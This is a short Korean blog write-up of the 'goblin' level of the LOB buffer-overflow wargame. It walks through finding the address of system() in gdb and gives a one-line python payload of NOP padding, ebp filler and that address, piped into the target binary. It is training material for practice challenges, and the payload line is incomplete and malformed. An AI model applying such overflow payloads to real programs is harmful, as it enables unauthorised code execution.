Wargame/CTF(Capture The Flag)

LOB goblin

𝓛𝓾𝓬𝓮𝓽𝓮_𝓢𝓽𝓮𝓵𝓵𝓪 2015. 9. 15.
728x90
반응형


접속을 하고 (cp 같은 것은 무시하겠습니다) 소스를 확인 하면

이번에 또한 buffer가 16인것을 확인 할 수있다.

먼저 vi 를 이용하여 프로그래밍 GOGO!!


위와같이

#include <stdio.h>

#include <stdlib.h>

int main(int argc, char *argv[]){

long shell;

shell = system 주소값;

나머지는 동일 하게 프로그래밍을 하고 gcc를 이용해 컴파일을 한다.


이제 system 주소값을 보기위해 gdb를 이용해 들어간후

b main명령어를 이용하여 메인에 브레이크 포인트를 건다.

그후 p system이라는 명령어를 이용하여 system 주소값을 확인한다.(프로그래밍할때 입력해야함)


이제 payload를 짜보면 (python -c 'print "\x90"*20+"AAAAA(ebp+8 때문에 입력(exit값을 넣어도 됨))+"주소값"';cat;)|./goblin 이렇게 된다.



728x90
반응형

'Wargame > CTF(Capture The Flag)' 카테고리의 다른 글

LOB wolfman  (0) 2015.09.15
LOB orc  (0) 2015.09.15
LOB gremlin  (0) 2015.09.14
LOB gate  (0) 2015.09.14
Challenge 36 - Back Up  (0) 2015.09.05

댓글0

💲 추천 글